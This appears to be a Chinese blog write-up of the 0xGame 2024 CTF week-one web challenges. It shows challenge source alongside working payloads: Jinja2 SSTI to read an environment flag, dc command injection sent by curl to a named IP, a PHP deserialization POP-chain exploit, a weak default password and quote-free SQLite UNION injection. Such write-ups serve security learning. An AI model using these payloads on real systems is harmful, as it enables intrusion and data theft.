0xgame 2024

meraklbz發表於2024-10-30

做不過來了,就跟著做了一點

第一週

#### ez_ssti

from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)

flag=os.getenv("flag")
os.unsetenv("flag")
@app.route('/')
def index():
    return open(__file__, "r").read()


@app.errorhandler(404)
def page_not_found(e):
    print(request.root_url)
    return render_template_string("The Url {} You Requested Can Not Found".format(request.url))

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8000)

直接在url後面新增

{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}

即可

ez_rce

from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/")
def index():
    return open(__file__).read()

@app.route("/calc", methods=['POST'])
def calculator():
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)
    return result.stdout

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

直接rce

curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"

hello_web

簽到

hello_http

http題目

ez_unser

php反序列化

<?php
highlight_file(__FILE__);
class Man{
    private $name="原神,啟動";
    public function __wakeup()
    {
        echo str_split($this->name);
    }
}
class What{
    private $Kun="兩年半";
    public function __toString()
    {

        echo $this->Kun->hobby;
        return "Ok";
    }
}
class Can{
    private $Hobby="唱跳rap籃球";
    public function __get($name)
    {
        var_dump($this->Hobby);
    }
}
class I{
    private $name="Kobe";
    public function __debugInfo()
    {
        $this->name->say();
    }

}
class Say{
    private $evil;
    public function __call($name, $arguments)
    {
        $this->evil->Evil();
    }
}
class Mamba{
    public function Evil()
    {
        $filename=time().".log";
        file_put_contents($filename,$_POST["content"]);
        echo $filename;

    }
}
class Out{
    public function __call($name,$arguments)
    {
        $o = "./".str_replace("..", "第五人格",$_POST["o"]);
        $n = $_POST["n"];
        rename($o,$n);
    }
}
unserialize($_POST["data"]); 

鏈子從上往下就行,先寫個檔案,然後去改名.exp如下.

<?php
highlight_file(__FILE__);
class Man{
    private $name;
    public function setname($name){
        $this->name = $name;
    }
}
class What{
    private $Kun;
    public function setKun($Kun){
        $this->Kun = $Kun;
    }
}
class Can{
    private $Hobby;
    public function setHobby($Hobby){
        $this->Hobby = $Hobby;
    }
}
class I{
    private $name;
    public function setname($name){
        $this->name = $name;
    }
}
class Say{
    private $evil;
    public function setevil($evil){
        $this->evil = $evil;
    }
}
class Mamba{
}
class Out{
}
$a = new Man();
$b = new What();
$c = new Can();
$d = new I();
$e = new Say();
$f = new Mamba();
//$f = new Out();
$e->setevil($f);
$d->setname($e);
$c->setHobby($d);
$b->setKun($c);
$a->setname($b);
echo serialize($a); 

ez_login

弱密碼,admin/admin123

ez_sql

sqlite注入有黑名單,扔個fuzz看看,發現單雙引號被槍斃了.
沒有單雙引號,可以使用char()去拼湊字串.數字注入不用擔心閉合.
用order by判斷了列數為5(雖然直接看也像是5),然後構造payload.

UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--